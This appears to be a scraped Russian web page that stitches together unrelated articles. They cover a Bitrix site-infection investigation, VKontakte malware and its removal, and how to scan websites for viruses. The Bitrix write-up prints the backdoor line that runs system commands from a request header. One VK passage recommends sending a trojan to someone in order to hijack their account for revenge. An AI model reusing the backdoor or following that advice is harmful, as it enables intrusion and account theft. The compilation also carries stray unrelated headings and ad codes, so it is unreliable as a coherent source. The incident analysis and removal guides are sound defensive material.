UPD февраль 2023: Судя по обращениям, поступающим в нашу компанию, прошла новая волна заражений сайтов на Битриксе, которые не обновлялись до лета 2022 года. В первых числах июля 2022 года техподдержка хостинга сообщила нам о наличии вредоносного кода на сайте нашего клиента. Письмо было следующего содержания:
Наличие вредоносной функции на веб-ресурсе Добрый день! По каналам Национального координационного центра по компьютерным инцидентам
получены сведения о наличии вредоносной функции на веб-ресурсе,
находящемся в зоне вашей ответственности. На веб-сайте выполняется JS-код, который перенаправляет пользователей на
подконтрольный злоумышленнику фишинговый сайт (XSS-атака).
Веб сайт: *****
В основе сайта лежит популярная CMS Битрикс. Следует отметить, что на сайте заказчика истек срок лицензии и, следовательно, он не был обновлен до последней версии. Мы сразу же принялись за изучение зараженных файлов. Ими оказались core.js и prolog.php.
10 самых опасных компьютерных ВИРУСОВ в истории, которые могут быть в ТВОЕМ компьютере
Злоумышленники внедрили в них подключение внешнего скрипта, который в конечном счете приводил к редиректу, т.е. к перенаправлению на другие сайты (это в лучше случае, а могли вообще все удалить). Удалив вредоносный код, мы начали думать, что делать дальше.
Хоть мы и восстановили зараженные файлы, сама уязвимость, которая была использована, до сих пор существовала, а, значит, атака могла повториться. На данном этапе мы изучили форумы Битрикс и обнаружили, что похожие случаи произошли и с другими пользователями. Конкретики по уязвимости мы не нашли, но появилось несколько зацепок.
Предположительной уязвимостью был обозначен устаревший модуль vote, однако дело было вовсе не в нем. Следующий наш шаг — это анализ сетевых запросов за прошедшие дни с целью обнаружить подозрительную сетевую активность. Усилия не пропали даром — был обнаружен подозрительный запрос по адресу /bitrix/tools/sale_print.php. Мы точно знаем, что такого файла в файловой системе Битрикса быть не должно. Однако по указанному пути данного файла не оказалось, т.к. предположительно (а позже мы это подтвердили) файл после обращения самоудалился.
Как ко мне на сайт попал вирус, если я никому не давал доступы?
Таким вопросом задается любой владелец сайта, когда его ставят перед фактом, что на его ресурсе вирус. Сразу же начинают искать вебмастеров, с которыми ранее работали. Менять пароли и доступы. Но, к сожалению, этого всего может быть недостаточно… … Итак, мы проанализировали сетевые запросы чуть ранее запроса на sale_print и обнаружили два запроса на /bitrix/tools/html_editor_action.php.
html_editor_action.php является частью визуального редактора Битрикс, в котором происходит работа с загружаемым контентом, например, изображениями. Было решено изучить кодовую базу данного функционала, чтобы точно определить являлся ли он причиной уязвимости.
В процессе мы узнали, что при загрузке контента через визуальный редактор, Битрикс загружает содержимое во временную папку, которую мы незамедлительно проверили. Как оказалось, не зря, т.к. во временной папке лежали файл и несколько логов (log) к нему, датированные 21 июня.
ВИРУСЫ от ПОДПИСЧИКОВ #8
При тщательном анализе выяснилось, что файл представляет собой сериализованный объект BitrixMainORMDataResult с системной командой на создание файла sale_print.php с закодированным содержимым. При этом судя по логам Битрикс думал, что это картинка. Теперь сомнений в уязвимости html_editor_action.php не возникало. Оставалось только понять, как файл был заброшен на сервер.
Здесь сделаем небольшое отступление. Так как у нас в руках оказался файл, порождающий sale_print.php, то мы смогли узнать его содержимое. А именно оказалось, что он не заражает файлы core.js и prolog.php. Файл sale_print.php создает фиктивный файл main.php, который находится по пути /bitrix/components/bitrix/main.file.input и маскируется по дате под стандартный функционал Битрикс.
Не обманывайтесь, он тут точно лишний, если нашли его у себя, то смело удаляйте. Также sale_print вносит следующие изменения в файл /bitrix/modules/fileman/classes/general/html_editor.php: «spell_word» => $_SERVER[‘HTTP_S’] == «bermuda» ? die(system($_SERVER[‘HTTP_P’])) : «», И if(substr($_POST[‘bxu_info’][‘CID’], 0, 7 ) === «default») die(); Эти строчки лишние, можете их удалить. В дальнейшем злоумышленники делают запросы на фиктивный main.php и с помощью него заражают файлы core.js и prolog.php.
Какие уязвимости CMS могут использовать злоумышленники?
Но давайте вернемся к уязвимости в html_editor_action.php. Ведь пока сохраняется возможность закидывать зараженные файлы — мы не в безопасности. Тщательный анализ кодовой базы html_editor_action.php привел нас к нескольким интересным выводам.
Насколько вероятно, что старые версии Битрикса могут быть не защищены от вирусов?
У Битриксов, которые давно не обновлялись (примерно до 2021) на входе стоит простая проверка на CSRF токен, а далее никаких специфических проверок не происходит, что позволяет злоумышленникам легко подделать запрос, как от реального пользователя (это мы воспроизвели на тестовом сайте). У Битриксов последней версии в том же месте стоит дополнительная проверка на авторизацию пользователя и, казалось бы, владельцам активной лицензии стоит выдохнуть, однако есть один нюанс.
Проверка требует ЛЮБОЙ авторизации пользователя, значит нам необязательно нужен админ, а, как мы помним, большинство сайтов на Битрикс это магазины. При заказе через магазин создается учетная запись покупателя, и заказчик получает возможность авторизоваться в Битриксе (например, чтобы попасть в личный кабинет).
Даже такой авторизации достаточно, чтобы обойти новые проверки Битрикс, а значит потенциально мы все еще в опасности. На основе анализа уязвимых файлов мы доработали проверки Битрикса, чтобы убрать саму возможность загружать вредоносные файлы, не сломав при этом функционал механизмов. Теперь мы с уверенностью можем сказать, что от этой дыры мы точно избавились и избавили наших клиентов. Но, как всегда, злоумышленники идут чуть впереди и изобретают все новые и новые способы атаки на безобидные сайты предпринимателей и компаний.
Как понять, что на моем сайте вирус?
- Вы обнаруживаете перенаправления на чужие сайты;
- Хостинг пишет вам о том, что на вашем сайте обнаружен вредоносный код;
- Яндекс Вебмастер выдает вам соответствующее сообщение;
- Ваши страницы полностью исчезли из индекса;
- Контекстная реклама Яндекс Директ остановила все ваши объявления без конкретных причин;
- Ваш сайт начал медленно работать и некоторое время был недоступен;
- На сайте появляются страницы, которые не относятся к тематике вашего сайта (как правило, запрещенная тематика).
Все это может свидетельствовать от том, что на сайте может быть вирус и нужно немедленно обратиться к врачу специалистам, которые поддерживают ваш сайт.
Что сделать, чтобы на сайте не появлялись вирусы?
- Регулярно обновлять версии CMS своего сайта. Ведь чем популярнее CMS, тем больше пользователей, а, следовательно, и тех, кто ищет в них различные лазейки;
- Менять с определенной периодичностью (3-6 мес.) пароли от хостинга и админки сайта;
- Удалять или менять доступы для сотрудников, которые уже не работают в вашей компании;
- Не давать доступы от сайта «ненадежным» пользователям;
- Использовать безопасные браузеры, которые блокируют отправку ваших персональных данных;
- Использовать надежный пароль, который трудно подобрать;
- Не устанавливать подозрительные программы и не переходить по подозрительным ссылкам.
Если вы испробовали все методы, а проблема не решается, то напишите нам, мы попробуем в ней разобраться.
Источник: kuratov.ru
Вирус вконтакте. Руководство по удалению вируса из vk Вирусы вконтакте
Количество существующих программ для получения доступа к чужому аккаунту способно вскружить голову. Google и Яндекс по соответствующему поисковому запросу выдают множество ссылок, наперебой зазывающих к себе и обещающих самый быстрый, самый безопасный способ взлома ВК без вирусов. Но можно ли им доверять?
Большинство подобных приложений работают против вас. Будучи установленными на компьютер, они вмиг распускают свои щупальца и крадут именно ваши пароли, лишь имитируя деятельность по взлому сторонней учетной записи. Поэтому, прежде чем спешить устанавливать нечто очень красочное и заманчивое, внимательно изучите отзывы на программу. Правдивая информация прячется на дальних страницах поисковых систем.
Надежный вирус для взлома контакта другого пользователя
Самым действенным вирусом для взлома контакта считается вездесущий троян. Как и мифический троянский конь, он втирается в доверие под видом другой программы. Создатели вредоносного файла используют массу хитрых уловок, обещая поиск уязвимостей, ускорение работы компьютера, уникальные смайлики и стикеры. Это очень простой и даже несколько наивный взлом ВК , но, как ни удивительно, он действительно работает.
Отправьте такой вирус тому, чей аккаунт вы желаете взломать. И вскоре вы получите доступ к его страничке или добьетесь того, чтобы администрация ВКонтакте заблокировала его страницу. Искусный способ отомстить.
Характерный признак — при входе на сайт открывается страница, в которой пишется нечто подобное:
Новые методы борьбы со спамом, и анонимными регистрациями. В связи с многочисленной регистрацией анонимных анкет, и активному подъему уровня спам-рассылок — теперь каждая анкета подлежит обязательной активации.Отправьте смс и так далее. Это лохотрон.
Причин может быть несколько.
1. C:WINDOWSsystem32driversetchosts — проверьте этот документ (открывать блокнотом), если там есть упоминания о ВКонтакте (vkontakte.ru) — удалите эти строки.
(ВНИМАНИЕ. Вы должны быть администратором компьютера).
2. Если у вас на жестком диске есть файл vkontakte.exe или VK.exe — удалите его.
Чтобы найти эти файлы, жмем Пуск->найти->файлы и папки, вводим имена файлов в строку поиска.
3. Проверьте компьютер на наличие вирусов.
В любом случае потом измените пароли от почтового ящика и от ВКонтакте.
ВКонтакте никогда не требует никакой активации страниц пользователей. Никогда не устанавливайте «дополнения» для сайта.
Вирус Win32.HLLW.AntiDurov
Настоящая эпидемия разразилась в мае.
Инфицированные этой новой чумой машины начинают рассылать другим пользователям “Вконтакте” ссылку на безобидную с виду jpeg-картинку, лежащую на интернет-ресурсе злоумышленника. На самом же деле сервер передает по этой ссылке исполняемый файл “deti.scr”, который, собственно, и является непосредственно сетевым вирусом.
После запуска на компьютере жертвы, червь сохраняет на диске саму картинку, на которую повелся неосторожный юзер, и запускает штатное приложение, используемое в системе для просмотра файлов.jpeg. Скопировав себя в папку на жестком диске компьютера жертвы под именем svc.exe, пришелец устанавливается в системе в качестве сервиса “Durov VKontakte Service” и бесцеремонно роется в ящиках в поисках пароля к доступу на сайт “Вконтакте“, а обнаружив, рассылает по всему списку контактов бедняги вышеупомянутую ссылку. Червь несет в себе опасную деструктивную функцию. 25 числа каждого месяца в 10 часов утра на экране компьютера будет выводиться следующее сообщение (орфография сохранена):
Павел Дуров Работая с “ВКонтакте.РУ” Вы ни разу не повышали свой рейтинг и поэтому мы не получили от Вас прибыли. За это Ваш компьютер будет уничтожен!
Если обратитесь в милицию, то сильно пожалеете об этом!
Одновременно с этим начнется удаление с диска C: всех файлов. Если пользователь будет достаточно долго вчитываться в данный текст и предастся размышлениям относительно его содержания, он рискует потерять не только все системные файлы, но и свои файлы данных — документы, фотографии, электронные письма и многое другое.
Оригинальный рецепт расположен на самом сайте вконтакте, но скорее всего у вас нет туда доступа, поэтому приводим тут полностью.
Для удаления вируса Вы можете воспользоваться batch-файлом
Сохраните его на диск и запустите.
Если Вы не уверены в результатах работы скрипта, воспользуйтесь следующей инструкцией:
1. Откройте консоль «Службы «. Для этого следует пройти по следующему пути: «Пуск » > «Панель управления » > «Администрирование » > «Службы «
2. В открывшемся окне найдите службу «Durov Vkontakte Service «, и откройте окно свойств, щёлкнув дважды по строке
3. Запомните имя службы (AntiDurov ) и путь к исполняемому файлу (в данном примере — C:Documents and SettingsalexanderApplication DataVkontakte )
4. Откройте Диспетчер задач , нажав одновременно клавиши CTRL+SHIFT+ESC , и на вкладке «Процессы » найдите процессы с названием svc.exe
5. Завершите эти процессы, поочерёдно выделяя их и нажимая кнопку «Завершить процесс «. Закройте Диспетчер задач.
6. Откройте командную строку: для этого в окне «Пуск » > «Выполнить. » наберите «cmd » и нажмите Enter
7. В окне командной строки наберите «sc delete AntiDurov » (последнее слово должно совпадать с запомненным вами именем службы) и нажмите Enter
8. Перейдя в окно консоли «Службы «, убедитесь, что служба «Durov Vkontakte Service » отсутствует (предварительно обновите содержимое окна, нажав F5
9. Откройте «Мой компьютер » и в строке адреса впишите путь к исполняемому файлу из п.3. (без имени самого файла svc.exe! ) Нажмите Enter .
10. В открывшемся окне выделите и удалите файл svc.exe, нажав SHIFT+DELЕTЕ
P.S.: если подобной службы Вы не обнаружили, но Вам кажется, что вирус всё равно есть, попробуйте его найти через поиск:
Пуск > Поиск > «Что вы хотите найти: файлы и папки «, в поле «Часть имени файла. » введите»svc.exe «, в «дополнительных параметрах » отметьте три первых пункта (в системных папках, в скрытых папках, вложенные папки)
Если файла с таким названием не найдено (именно с таким названием , файлы вроде «cisvc», «svchost» не в счёт), то вируса, вероятнее всего, нет.
Если файл найден, убедитесь, что им не запущены процессы (см. пункты 4 и 5), после чего удалите файл, выделив его в окне результатов поиска и нажав SHIFT+DELЕTЕ .
P.S.
Установите антивирус, или воспользуйтесь онлайн антивирусом . Перейдите по ссылке и нажмите Kaspersky Online Scanner
Ни для кого не секрет, что большую часть своего времени многие люди просиживают в различных социальных сетях. Не будем сейчас говорить о том, насколько это вредно, потому что цель данного материала заключается не в этом.
Одним из самых популярных таких сервисов является Вконтакте, или попросту Контакт. Человек может выложить там все свои фотографии, переписываться с друзьями, слушать музыку, смотреть видео и т.д. И если не работает Контакт, для некоторых это становится большой трагедией. Так вот, сегодня я хочу рассказать об одной из проблем такой «досады».
Итак, если вам не удается попасть на страницу своего аккаунта, это может быть вирус. Его признаки — надпись на странице входа, которая требует отправить СМС для верификации данных или же написать номер своего мобильного. В этом случае не спешите «кричать» на форумах «у меня не работает контакт». Проблема достаточно распространенная и обсуждалась уже не раз.
Во-первых, не верьте всему тому, что написано на этой странице социальной сети. Во-вторых, ни в коем случае не отправляйте сообщения на указанные номера, в противном случае вы лишитесь всех своих денег с мобильного счета.
Прежде чем рассказать вам, как Вконтакте, давайте разберемся, какой у него принцип работы. Он полностью идентичен со своим «родственником», которые делают то же самое в не менее популярной социальной сети Одноклассники. Он заменяет своим зеркалом эти сайты. Таким образом, интерфейс вам знаком, но на самом деле это совершенно другой сайт.
Итак, как Вконтакте? Вы должны открыть папку Ect, которая расположена в папке drivers. Последняя, в свою очередь, находится в Systems32, в системной папке Windows. Открываете файл Hostes и удаляете в нем абсолютно все записи, находящиеся после строки localhosts 127.0.0.1. Теперь ваша задача заключается в том, чтобы обнаружить файл Vkontakte.exe, после чего его необходимо ликвидировать.
Стоит отметить, что этот софт-вредитель постоянно совершенствуется, поэтому возможно такое, что через некоторое время данный способ может не сработать. В таком случае, как удалить вирус Вконтакте, вам подскажет поисковик.
Есть и другой способ, как это сделать. У вас должен быть установлен на компьютере надежный антивирус. В этом случае вероятность проникновения вирусного агента стремится к нулю. И если беда случилась при наличии на вашей машине антивирусного программного обеспечения, это говорит о том, что оно ненадежно, или вы давно не обновляли свои базы.
Обновите их или установите себе более подходящий вариант, просканируйте весь жесткий диск и оперативную память. Как только вы обнаружите сторонние вредоносные программы, удалите их и перезагрузите свой компьютер.
Если новый антивирус не дал положительного результата, выберите себе другой и повторяйте процедуру до тех пор, пока вы не сможете зайти на свою страницу социальной сети привычным способом. Когда вирус исчезнет, перед вами появится стандартный интерфейс входа где вы просто введете свой логин с паролем и попадете на страницу своего аккаунта. На этом все. Теперь вы знаете, как удалить вирус Вконтакте. Надеюсь, статья помогла вам решить данную проблему.
Вирус способен перенаправлять пользователя с оригинальной страницы авторизации Вконтакте на зеркальную, но используемую злоумышленниками. Чаще всего вирус просит отправить СМС , для подтверждения своей личности. Вводить данные на таких страницах нельзя, поскольку существует сразу несколько вариантов быстрого решения этой проблемы.
Вирус Вконтакте — как быстро удалить
В некоторых случаях вирус может проявить себя, отображая на личной странице пользователя рекламные объявления. Они закрывают немалую часть контента и содержат фишинговые ссылки. Есть несколько способов избавиться от этой проблемы.
Шаг 1: Проверка антивирусом
Поскольку вирус подменяет оригинальную страницу авторизации Вконтакте на зеркало, его может легко выявить любой хороший антивирус. Например, бесплатный и портативный Dr. Web С ureit . Чтобы произвести проверку необходимо:
- Скачать антивирус с официального сайта.
- Запустить загруженный файл.
- Выбрать выборочную проверку, где нужно отметить галочками все пункты.
- Перезапустить компьютер после завершения процесса.
Примечание. Сканирование желательно проводить в безопасном режиме. Включается он нажатием клавиши F8, в момент загрузки системы. В этом случае антивирус получит полный доступ ко всем подозрительным файлам.
Следует учесть, что проверка обычно длится более получаса. В конце программа сообщает об обнаруженных угрозах и пользователь самостоятельно решает, что делать с найденными файлами.
Шаг 2: Файл Hosts
Если по-прежнему не заходит ВКонтакте, необходимо почистить файл Hosts. В нем прописываются IP всех страниц, загружаемых из кэша. Вирус подменяет оригинальный IP Вконтакте на поддельный, таким образом, пользователю подгружается совсем другой сайт. Любые введенные данные на подобных страницах могут быть похищены. Чтобы избежать этого, нужно проделать следующие действия:
Если папку etc найти не удалось, нужно запустить Блокнот, затем, в меню «Файл » выбрать пункт «Открыть «, после чего пройти по пути, указанному в списке выше.
Шаг 3: Удаление Vkontakte.exe
Vkontakte.exe зачастую является корнем проблемы, поскольку он и является вирусом. Чтобы решить проблему с авторизацией, нужно удалить его. Обнаружить этот файл несложно, действия следующие:
Примечание. Иногда вирус блокирует доступ к Vkontakte.exe, в этом случае может помочь восстановление системы до того момента, как начались проблемы. Для этого используют специальное ПО. Некоторые антивирусы изначально снабжены этой функцией. Также можно воспользоваться стандартной программой Windows, если предварительно было настроено создание точек восстановления.
Источник: optostudy.ru
Как проверить сайт на вирусы — 5 способов
Владельцы сайтов не всегда задумываются о защите своего ресурса. От взлома, хакерских атак и вирусов. А зря — под угрозой не только сайты крупных компании, но и мелкого бизнеса, и просто личные блоги.
В статье расскажем, как проверить сайт на вирусы и как распознать, что он заражен. Какие есть способы защитить свой сайт от вирусов.
Реклама: 2VtzqvEDHis
Как понять, что сайт заражен вирусом
В идеале, стоит изначально настроить автоматическую защиту и проверку сайта на вирусы. Например, поставить плагин антивируса, если используете CMS. Тогда в случае заражения или попыток внести изменения на сайт, владелец получит уведомление и сможет сразу принять меры.
Но есть явные признаки, по которым и без уведомлений понятно, что сайт заражен. Тогда нужно проверять и «лечить» сайт от вирусов как можно скорее.
Признаки заражения сайта вирусом:
- заметны явные изменения в работе сайта — например, страницы стали долго загружаться, пропала часть информации, появился контент, который вы не загружали, резко и сильно изменилась скорость загрузки в Google PageSpeed;
- на сайте появилась нежелательная реклама;
- при попытке зайти на сайт происходят многочисленные редиректы (автоматические перенаправления страниц) — это стопроцентный признак заражения;
- сайт попал под фильтры поисковых систем, хотя вы ничего не нарушали — обычно этот признак указывает на то, что сайт заражен уже долгое время (больше 2 недель, хотя это зависит от степени заражения);
- сайт пропал из выдачи (он уже под фильтрами) или резко опустил свои позиции в поиске;
- появились лишние файлы и папки — чаще всего это видно не на самом сайте, а на сервере, если зайти в папки через FTP;
- антивирус прислал уведомление о заражении сайта;
- хостинг-провайдер прислал предупреждение о проблемах с безопасностью сайта;
- на сайте появилось много исходящих ссылок, ведущих на чужие ресурсы (вы эти ссылки не добавляли);
- иногда сайт может вообще не открываться;
- при открытии сайта вместо него показывается предупреждение от браузера, что ресурс небезопасный и может украсть данные посетителя (неявный признак, иногда такое бывает, если вовремя не обновить SSL-сертификат или не перейти на https-протокол);
- резко увеличилась или упала посещаемость сайта — в первом случае это могут быть заходы ботов;
P.S. У сайта может быть один или несколько признаков заражения (то есть, не все сразу). Например, редиректы и много исходящих ссылок.
Как проверить сайт на вирусы
Есть несколько способов проверить сайт на вирусы. Методы можно использовать по отдельности или провести комплексную проверку. Важно, что вирус может быть как в коде сайта, так и в контенте, поэтому стоит использовать способы, которые позволяют проверить и то, и другое.
1. Через хостинг
У большинства современных хостинг-провайдеров в панели управления сайтом есть инструменты для его проверки на вирусы. Если для управления вашим сайтом используется cPanel, инструмент может так и называться — «Антивирус». Если нажать на него, можно запустить сканирование всех папок с сайтом на хостинге.
В зависимости от хостинга и панели инструмент может находиться в разделе «Безопасность», «Дополнительно», «Расширенные». Называться он тоже может по-разному, например, «Защита от вирусов», «Сканирование на вирусы». Может быть добавлен конкретный антивирус в панель, например, в cPanel часто добавляют ImunifyAV.
2. Через онлайн-сервисы
Самый простой способ — использовать сервисы. Некоторые вирусы можно обнаружить даже на бесплатных тарифах. Принцип работы у сервисов похожий. Если наш список вам не подойдет, всегда можно найти аналог по запросу «Онлайн проверка сайта на вирусы».
Sucuri — заграничный сервис, в котором есть несколько инструментов для обеспечения безопасности сайта. Стоит от 199.99 долларов в год, но проверить сайт на вирусы можно и бесплатно. Для этого нужно зайти на страницу sitecheck.sucuri.net и ввести домен сайта. Затем нажать зеленую кнопку «Scan Website».
Бесплатный сканер имеет ограниченные возможности, но даже этого достаточно, чтобы обнаружить некоторые вирусы на сайте. Чтобы посмотреть более подробный отчет и очистить сайт, нужно зарегистрироваться и оплатить доступ.
Пример сайта, зараженного файлом с вредоносным кодом. Сервис показывает, какие части сайта затронуты вирусом.
Этот же сайт, но после очистки от вирусов:
VirusTotal — еще один заграничный сервис, позволяет проверить сайт по ссылке, через загрузку файла или из поиска. Можно просканировать без регистрации на сайте. Сервис использует большую базу по более, чем 65 антивирусам, что позволяет с большой вероятностью обнаружить вирус.
Kaspersky Threat Intelligence Portal (бывший Kaspersky VirusDesk) — онлайн сканер от вируса Касперский. Позволяет проанализировать сайт по адресу, из поиска или через загрузку файлов сайта с компьютера. Бесплатная версия ограничена.
Norton Safe Web — онлайн сервис от известного антивируса Norton Security. Работает аналогично предыдущим — вставляем ссылку на сайт и жмем на кнопку поиска.
Так он определяет безопасный сайт:
3. Через инструменты поисковиков
Это Google безопасный просмотр и Yandex Site status check.
Работают стандартно — нужно ввести адрес сайта в поле на сервисе. Вот как это выглядит в Google:
Если все ок, сервис напишет, что небезопасный контент не найден.
Сервис от Яндекса работает также — пишем адрес сайта в поле сканера, жмем кнопку «Check»:
Если все ок, сканер напишет «No threats detected on адрес сайта».
Насколько эти сканеры информативны, судить сложно. Но если поисковик уже заметил вирусы на сайте, то скорее всего, скоро он может попасть под фильтры в черный список (а может уже попал). Скорость обнаружения вирусов через сканеры поисковиков может зависеть от того, насколько часто поисковые роботы посещают ваш сайт.
4. Через антивирус, установленный на сайте
Когда заводите сайт, лучше сразу позаботиться о дополнительной безопасности и установить на него антивирус. Если сайт на движке, обычно ставят плагины. Например, для Вордпресс это AntiVirus, WP Antivirus Site Protection, iThemes Security, Centrora WordPress Security, Anti-Malware Security and Brute-Force Firewall.
Такие плагины препятствуют заражению сайта, предупреждают о попытках взлома и позволяют продиагностировать сайт на предмет наличия вирусов.
Есть также плагины специально для сканирования сайта и поиска вредоносного кода, например, Wemahu, Exploit Scanner. Но лучше все-таки установить комплексный плагин, который и сканирует, и защищает сайт.
5. На своем ПК
Как один из способов — скачать архив с содержимым сайта с сервера (через FTP) и проверить антивирусом, установленным на компьютере. Если антивирус находит угрозы — удалить и перезалить пролеченные папки обратно на сервер. Главное, убедиться, что антивирус не принял за угрозу важный файл, который влияет на работоспособность сайта.
Также обязательно нужно проверить, не успел ли сайт попасть под фильтры поисковиков (если нет явных признаков, что уже попал). Для проверки на фильтры от Google нужно зайти в Google Search Console — «Поисковый трафик» — пункт «Меры, принятые вручную». Для проверки в Яндексе нужно зайти в Яндекс.Вебмастер, раздел «Диагностика» — пункт «Безопасность и нарушения».
Очистка сайта от вирусов
В данной статье мы не будем подробно описывать процесс очистки — он зависит от степени поражения сайта. В одном случае достаточно удалить зараженный файл, в другом придется полностью восстанавливать сайт из исходной версии, нередко с потерей данных. Новичкам лучше обращаться к специалистам или использовать программы и плагины для очистки сайта от вирусов.
*Для возможности восстановить и использовать более старую версию сайта советуем настроить бэкапы — это периодическое сохранение версий сайта в архив. Например, раз в неделю или каждый день. В случае, если нужно полностью восстанавливать сайт, старая версия убирается с сервера, и вместо нее загружается версия из бэкапа. Регулярное создание бэкапов может быть одной из функций вашего хостинга. Для CMS созданы плагины бэкапов.
Как обезопасить сайт от заражения вирусами — несколько простых рекомендаций
Минимальные шаги, которые можно предпринять:
1.Выбрать надежного хостинг-провайдера со встроенным антивирусом, сканером и, в идеале, инструментом регулярного создания бэкап версий сайта. Если инструмента создания бэкапов нет — нужно ставить отдельный плагин на сайт.
2.Установить антивирус на сайт в самом начале его работы. Выбирайте антивирус, у которого регулярно обновляются базы и есть несколько степеней защиты.
3.Если у вас сайт на Вордпрессе — спрячьте стандартный адрес админки. Для этого есть специальные плагины, например, Rename wp-login.php, WPS Hide Login, Clearfy Pro.
4.Придумать сложный пароль для входа в админ-панель сайта.
5.Если у вас есть сотрудники, работающие с сайтом, создайте для них отдельные профили в админке без права администрирования сайта и без доступа к его файлам. Если все же необходимо дать доступ к админке или к FTP — после завершения работ все равно стоит поменять пароли.
6.Периодически проводить сканирование сайта на вирусы.
7.Настроить регулярное создание бэкапов — если сайт все-таки будет заражен, его будет легче восстановить.
8.Не давать данные для входа в админку, на хостинг и сервер третьим лицам.
*Иногда мошенники представляются SEO-специалистами, программистами, дизайнерами и предлагают услуги по улучшению работы сайта. Получив данные от админки, на сайт запускают вирус. Прежде чем сотрудничать с кем-либо, внимательно изучите историю компании и отзывы.
9.Если не удалось избежать заражения сайта, после его лечения нужно поменять все пароли и усилить защиту сайта. Например, поставить более мощный антивирус.
10.Не ругаться с программистами, создавшими ваш сайт))
Заключение
Всегда проще предотвратить проблему, чем бороться с последствиями. Для начала постарайтесь максимально защитить свой сайт от вирусов и взлома. Затем проводите периодическое сканирование и следите за работой сайта, а также трафиком. Если заметите признаки заражения, описанные в данной статье — нужно незамедлительно проверить сайт любым из описанных способов и срочно принимать меры по его лечению, если угроза будет найдена.
Полезные статьи:
- Что такое микроразметка и как ее добавить на сайт
- Как проиндексировать сайт в Google и Яндекс
- Как удержать пользователя на сайте — 27 способов
Реклама: 2VtzqvZucsD
Источник: postium.ru